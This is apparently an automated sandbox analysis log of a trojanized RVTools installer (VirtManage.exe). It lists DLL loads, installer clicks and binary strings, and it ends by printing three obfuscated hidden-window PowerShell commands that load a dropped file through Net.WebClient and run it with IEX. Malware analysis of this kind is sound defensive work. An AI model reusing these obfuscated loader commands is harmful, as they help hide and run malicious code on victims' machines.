Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeSection loaded: mfc42u.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeSection loaded: aclui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: mfc42u.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: aclui.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: textshaping.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: uxtheme.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: textinputframework.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: coreuicomponents.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: coremessaging.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: ntmarta.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: coremessaging.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: wintypes.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: wintypes.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\whoami.exeSection loaded: version.dll
Source: C:\Windows\System32\whoami.exeSection loaded: authz.dll
Source: C:\Windows\System32\whoami.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\VirtManage.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: I Agree
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\msiexec.exeWindow detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: C:\Windows\SysWOW64\msiexec.exeWindow detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: VirtManage.exeStatic PE information: certificate valid
Source: VirtManage.exeStatic file information: File size 10522168 > 1048576
Source: VirtManage.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp, MSI32C4.tmp.9.dr
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb= source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp, MSI32C4.tmp.9.dr
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.pdb source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000001E.00000002.1249340927.0000016E3046D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OLEView.pdb source: 7za.exe, 00000013.00000003.1010646142.000001AC45EBA000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000013.00000003.1010553824.000001AC45EEA000.00000004.00001000.00020000.00000000.sdmp, oleview.exe, 0000001A.00000002.3333907718.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001A.00000000.1077218028.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001D.00000002.1300919090.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp, oleview.exe, 0000001D.00000000.1185413739.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.1251740114.0000016E30589000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb]mb-) source: powershell.exe, 0000001E.00000002.1251921332.0000016E305A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.1218645117.0000016E1620A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Pn.pdb source: powershell.exe, 0000001E.00000002.1249340927.0000016E3046D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OLEView.pdbGCTL source: 7za.exe, 00000013.00000003.1010646142.000001AC45EBA000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000013.00000003.1010553824.000001AC45EEA000.00000004.00001000.00020000.00000000.sdmp, oleview.exe, 0000001A.00000002.3333907718.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001A.00000000.1077218028.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001D.00000002.1300919090.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp, oleview.exe, 0000001D.00000000.1185413739.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.pdbhP source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: tomation.pdb{AD.v source: powershell.exe, 0000001E.00000002.1251740114.0000016E30589000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Obfuscated command line found
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))"
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')"
